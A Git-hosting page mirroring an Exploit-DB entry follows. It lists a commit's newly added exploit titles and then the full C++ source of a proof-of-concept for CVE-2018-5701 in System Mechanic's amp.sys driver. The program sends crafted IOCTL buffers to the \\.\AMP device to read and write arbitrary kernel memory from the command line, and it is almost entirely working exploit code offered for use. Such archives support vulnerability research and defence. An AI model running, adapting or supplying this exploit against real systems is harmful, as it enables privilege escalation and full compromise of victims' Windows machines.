bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/51044.txt
Exploit-DB 79023d1f9c DB: 2023-03-26 
22 changes to exploits/shellcodes/ghdb

Password Manager for IIS v2.0 - XSS

DLink DIR 819 A1 - Denial of Service

D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution

Abantecart v1.3.2 - Authenticated Remote Code Execution

Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)

Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution

Employee Performance Evaluation System v1.0 - File Inclusion and RCE

GuppY CMS v6.00.10 - Remote Code Execution

Human Resources Management System v1.0 - Multiple SQLi

ImpressCMS v1.4.3 - Authenticated SQL Injection

Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal

MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution

NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi

Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)

PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS

SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution

Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection

Yoga Class Registration System v1.0 - Multiple SQLi

NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle

_camp_ Raspberry Pi camera server 1.0 -  Authentication Bypass

System Mechanic v15.5.0.61 - Arbitrary Read/Write
2023-03-26 00:16:30 +00:00

166 lines
No EOL
7.2 KiB
Text
Raw Permalink Blame History

/*
# Exploit Title: System Mechanic v15.5.0.61 - Arbitrary Read/Write
# Date: 26-09-2022
# Exploit Author: Brandon Marshall
# Vendor Homepage: https://www.iolo.com/
# Tested Version - System Mechanic version 15.5.0.61
# Driver Version - 5.4.11 - amp.sys
# Tested on OS - 64 bit Windows 10 (18362)
# Fixed Version - System Mechanic 17.5.0.116
# CVE : CVE-2018-5701
*/
#include <iostream>
#include <Windows.h>
#include <psapi.h>
#include <stdio.h>
#pragma warning(disable:4996)
typedef struct _kernelDriverInformation {
char* imageName;
void* imageBase;
}kernelDriverInformation, * PKernelDriverInformation;
typedef struct _functionInformation {
char* functionName;
void* functionOffset;
void* functionBase;
}functionInformation, * PFunctionInformation;
void callDeviceIoControl(HANDLE deviceHandle, void* inputBuffer, DWORD inputBufferSize) {
DWORD bytesReturned;
NTSTATUS status = DeviceIoControl(deviceHandle, 0x226003, inputBuffer, inputBufferSize, NULL, NULL, (LPDWORD)&bytesReturned, (LPOVERLAPPED)NULL);
}
HANDLE getDeviceHandle(char* name) {
DWORD generic_read = 0x80000000;
DWORD generic_write = 0x40000000;
HANDLE handle = CreateFileA((LPCSTR)name, GENERIC_READ | generic_write, NULL, NULL, 0x3, NULL, NULL);
return handle;
}
void* CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(void* addressToDereference, SIZE_T bufferSize) {
byte* maliciousBuffer = (byte*)malloc(bufferSize);
*(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5
*(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
*(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
*(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
*(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
*(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)0; // param2
*(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToDereference; // param3
*(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)0; // param4
return (void*)maliciousBuffer;
}
void* CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(SIZE_T bufferSize) {
byte* maliciousBuffer = (byte*)malloc(bufferSize);
*(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5
*(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
*(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
*(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
*(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
*(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2
*(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)(maliciousBuffer + 0x40); // param3
*(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x48); // param4
*(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0; //unknown
*(ULONGLONG*)(maliciousBuffer + 0x48) = 0xffffffff; // param1
return (void*)maliciousBuffer;
}
void* CreateWriteDWORDFromKernelMemoryIOCTLBuffer(void* addressToWriteTo, SIZE_T bufferSize) {
byte* maliciousBuffer = (byte*)malloc(bufferSize);
*(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5
*(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
*(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
*(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
*(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
*(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2
*(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToWriteTo; // param3
*(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x40); // param4
*(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0xffffffff;
return (void*)maliciousBuffer;
}
DWORD leakDWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) {
void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(addressToLeak, bufferSize);
callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize);
free(writeAddresInAMPsKernelMemoryIOCTLBuffer);
//address should now be written in kernel memory
void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(bufferSize);
callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize);
DWORD returnVal = *(DWORD*)((byte*)ReadDWORDFromKernelMemoryLeakIOCTLBuffer + 0x40);
free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer);
return returnVal;
}
void writeDWORD(void* addressToWrite, void* PDWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) {
void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(PDWORDToWrite, bufferSize);
callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize);
free(writeAddresInAMPsKernelMemoryIOCTLBuffer);
//address should now be written in kernel memory
void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateWriteDWORDFromKernelMemoryIOCTLBuffer(addressToWrite,bufferSize);
callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize);
free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer);
return;
}
void* leakQWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) {
DWORD firstDWORD = leakDWORD(addressToLeak, deviceHandle, bufferSize);
DWORD secondDWORD = leakDWORD((byte*)addressToLeak + 0x4, deviceHandle, bufferSize);
void** Pqword = (void**)malloc(0x8);
for (int i = 0; i < 4; i++) {
((byte*)Pqword)[i] = ((byte*)&firstDWORD)[i];
((byte*)Pqword)[i + 4] = ((byte*)&secondDWORD)[i];
}
return (*(void**)Pqword);
}
void writeQWORD(void* addressToWrite, void* QWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) {
writeDWORD(addressToWrite, QWORDToWrite, deviceHandle, bufferSize);
writeDWORD((byte*)addressToWrite + 0x4, ((byte*)QWORDToWrite + 0x4), deviceHandle, bufferSize);
}
int main(int argc, char* argv[])
{
ULONGLONG addressToReadorWrite = strtoull(argv[2], NULL, 16);
HANDLE deviceHandle = getDeviceHandle((char*)"\\\\.\\AMP");
SIZE_T size = 0x300;
if (strcmp(argv[1], "read") == 0) {
void* leakedQWORD = leakQWORD((void*)addressToReadorWrite, deviceHandle, size);
printf("Value stored at virtual address %0llx is %0llx", addressToReadorWrite, leakedQWORD);
}
else if (strcmp(argv[1], "write") == 0) {
ULONGLONG QWORDToWrite = strtoull(argv[3], NULL, 16);
writeQWORD((void*)addressToReadorWrite, (void*)&QWORDToWrite, deviceHandle, size);
printf("Wrote %0llx to virtual address %0llx", QWORDToWrite, addressToReadorWrite);
}
}
Reference in a new issue View git blame Copy permalink